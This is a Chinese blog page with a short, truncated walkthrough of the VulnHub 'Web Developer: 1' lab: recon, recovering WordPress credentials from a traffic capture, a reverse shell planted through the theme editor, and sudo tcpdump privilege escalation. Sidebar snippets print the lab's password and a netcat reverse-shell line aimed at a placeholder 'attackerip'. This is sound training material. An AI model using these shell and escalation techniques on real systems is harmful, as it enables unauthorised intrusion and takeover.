vulnhub - webdeveloper考点:(信息搜集&wireshark&wordpress漏洞&linux tcpdump提权)

最新推荐文章于 2024-01-06 23:48:57 发布
最新推荐文章于 2024-01-06 23:48:57 发布
阅读量325 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105711013
版权
本文介绍了在Vulnhub的WebDeveloper靶机中,通过NAT网络进行ARP扫描、Nmap探测端口,发现WordPress网站并使用wpscan进行扫描。进一步利用dirbuster找到登录页面,通过Wireshark分析流量文件获取账号密码。成功登录后,利用WordPress主题编辑器植入reverse-shell,并找到上传点。最终,通过SSH登录,使用sudo执行tcpdump实现提权。
摘要由CSDN通过智能技术生成

https://www.vulnhub.com/entry/web-developer-1,288/

nat网络
arp-scan -l 比平常多出来的ip就是靶机了。。

nmap看到80,22
80当然是web里搜集信息,22要想到可能会ssh登录。。

进去看到是WordPress博客,要想到wpscan扫它,扫出了用户,不过没有太亮眼的其他发现。

dirbuster之类的扫目录,发现登录框。。。 和ipdata,里面有流量文件,下载下来wireshark分析

在wireshark里当然是找和wp-login wp-admin 这一类的http 相关的,或许可以找到登录信息。
最后在180发现账号密码。。
在这里插入图片描述

进去后老套路,appearance-editor,改随便哪个网页的php,换上自己的reverse-shell这里
我一般换404的,
这个theme似乎不能改。换成twentysixteen。再改

可以配合dirbuster扫的路径,找到自己的上传点,既然是改theme,总是在content-theme路径下

192.168.189
最低0.47元/天 解锁文章
冬萍子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机VulnHub-Web Developer
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
vulnhub Web Developer: 1
箭雨镜屋
01-02 1919
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
No.29-VulnHub-Web Developer: 1-Walkthrough渗透学习
qq_34801745的博客
01-24 929
** VulnHub-Web Developer: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 靶机难度:初级(CTF) 靶机发布日期:2018年11月5日 靶机描述: Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主...
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 923
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机:WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
Vulnhub靶机渗透测试实战(二):Web Developer: 1
weixin_41038469的博客
03-18 3244
靶机下载地址: https://www.vulnhub.com/entry/webdeveloper-1,288/ 攻击机ip: 172.20.10.5 经过主机发现 靶机ip地址: 172.20.10.11 上传shellcode 发现后台有更改插件代码的功能,选择Plugins->Editor 选择要更改的插件:Hello Dolly 上传shellcode,以获得反弹shell fso...
full-stack-web-developer::fire:成为Full Stack Web开发人员的路线图。 什么? 为什么? 怎么样?
02-05
全栈Web开发者是一种掌握前端和后端技术的全能型程序员,他们能独立完成从界面设计到服务器端逻辑的完整Web应用开发。"full-stack-web-developer::fire:成为Full Stack Web开发人员的路线图。 什么? 为什么? 怎么...
grpc-web-devtools:适用于Chrome的gRPC调试器
01-31
gRPC Web开发工具此扩展支持从浏览器调试 。 它使用的是当前正在的公开调试器接口。 愿景是能够像使用Chrome中的“网络”标签一样轻松地调试gRPC Web。 为此,我们想听听您的调试器用例。 请提出一个问题:) 非常非常...
leetcode下载-developer-skillpoints:软件工程师-->技能知识图谱-->大厂面试必备
06-29
leetcode下载 1.操作系统 2.计算机网络 3.数据结构 4.Java 5.Android 6.设计模式 7.音视频 8.Git 9.字节码 10.EventBus ...操作系统划分任务给进程,同时把内存资源也交给进程 进程组织线程来执行任务,线程执行过程是...
wordpress-theme-developer:使用gulp和docker开发WordPress主题的入门工具
02-03
WordPress的主题开发者 入门开发使用WordPress主题gulp任务运行和docker服务WordPress和你的主题,而不需要另一个网站服务器(无MAMP / XAMP / LAMP)。 保持项目隔离,系统干净! 功能:SCSS处理,代码整理,源...
rick-and-morty-character-search:Rick&Morty角色搜索Web APP || 使用HTML5,CSS3和React开发Adalab数字前端开发训练营的第3单元最终项目
04-02
瑞克和莫蒂角色搜寻 Adalab数字前端开发训练营的第3单元最终项目。 这是一个响应Swift的Rick and Morty角色搜索网络应用,使用 和 。 快速入门指南 启动该项目的说明: 前提条件 该项目与 。 从开始指南。...
cloud-config-toolbox-ui:dCloud协作工具箱页面,用于管理像Cisco Answers这样的云演示配置
02-24
cloud-config-toolbox-ui dCloud Colud Configuration Web门户UI项目。 它使用Webpack 4在Vue.js 2.6(包括vue-router和vuex)上构建。 发展 用法 yarn以安装依赖项软件包yarn start构建库并使用热重载yarn build:test开始开发环境yarn build:test以构建生产文件并启动快速Web服务器以测试生产文件vue-devtools以启动Vue.js开发人员工具电子应用程序。 您将需要在全球范围内单独安装此工具,但是一旦可用,您就可以使用此命令行来监视Vue应用程序的状态和DOM详细信息。 此脚本仅在开发模式下添加到index.html。 智威汤逊 开发网站上的登录功能将提示您输入JWT,因为它无法重定向您真正的SSO提供程序。 您可以通过访问并登录,然后打开浏览器JavaScrip
sudo-tcpdump提权
weixin_30621711的博客
02-01 573
当当前用户可以通过sudo执行tcpdump时,可以用来进行提权 tcpdump中有两个参数-z和-Z,前者用来执行一个脚本,后者用来指定tcpdump以哪个用户运行,当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而达到提权的目的 一、编写反向shell脚本 #shell.sh mknod backpipe p && nc attackerip ...
tcpdump
lyyslsw的专栏
12-30 1257
linux 普通用户默认是没有权限使用tcpdump的, 所以需要root 用户赋权: root# setcap cap_net_raw=eip /usr/sbin/tcpdump 不要为普通用户添加tcpdump的sudo权限, zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /us...
vulnhub - /symfonos-3 (考点:shellshock & tcpdump /cap & linux修改py提权
冬萍子癸水
04-26 835
https://www.vulnhub.com/entry/symfonos-3,332/ nat网络 arp-scan -l 扫出多的那个IP就是靶机 nmap 21想到ftp进去找文件,pro这个1,3 5 版本有漏洞,这个靶机系列的上一台有,joy靶机也有。之前都讲了 22想到可能ssh登录 80web搜集信息 PORT STATE SERVICE VERSION 21/tcp o...
wireshark渗透学习笔记(实验环境搭建)
LvanFu的博客
08-29 509
实验准备软件: eNSP:可以模拟网络环境(现在官网已经找不到下载了,只能通过其他途径)。 virtualbox:为eNSP提供支持。 wireshark:这个就是我们要学习的东西。 winpcap:为wireshark提供支持。 VMware:虚拟机。 kali linux镜像:用来在VMware中安装kali系统。 PS:eNSP和virtualbox很容易出现不兼容和各种错误,请自行耐心解决,因为错误姿势太多了,所以就不写解决方法了,自行查看相关文档吧。 在安装eNSP是会自动检测系统
Vulnhub靶机 Symfonos 3
菜浪马废的博客
09-26 427
有shellshock漏洞 验证一下 上传pspy32扫到的进程 下载文件 wireshark进行分析 得到账号密码 登录成功 修改脚本 等待一会得到root权限
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
whyrookie的博客
04-15 7537
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Sh...
Tre靶场通关过程(linpeas使用+启动项编辑器提权
tpaer的博客
05-07 2225
通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权信息收集再进行提权
Linpeas的简单使用
最新发布
Themanager112的博客
01-06 1667
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
C# 70-316考试指南:Windows应用开发Q&A v2.0
这个资料包特别适合准备微软MCSD(Microsoft Certified Solution Developer)或MCAD(Microsoft Certified Application Developer)认证中的70-316考试的考生。这个考试通常涉及以下知识点: 1. **C#基础**:包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值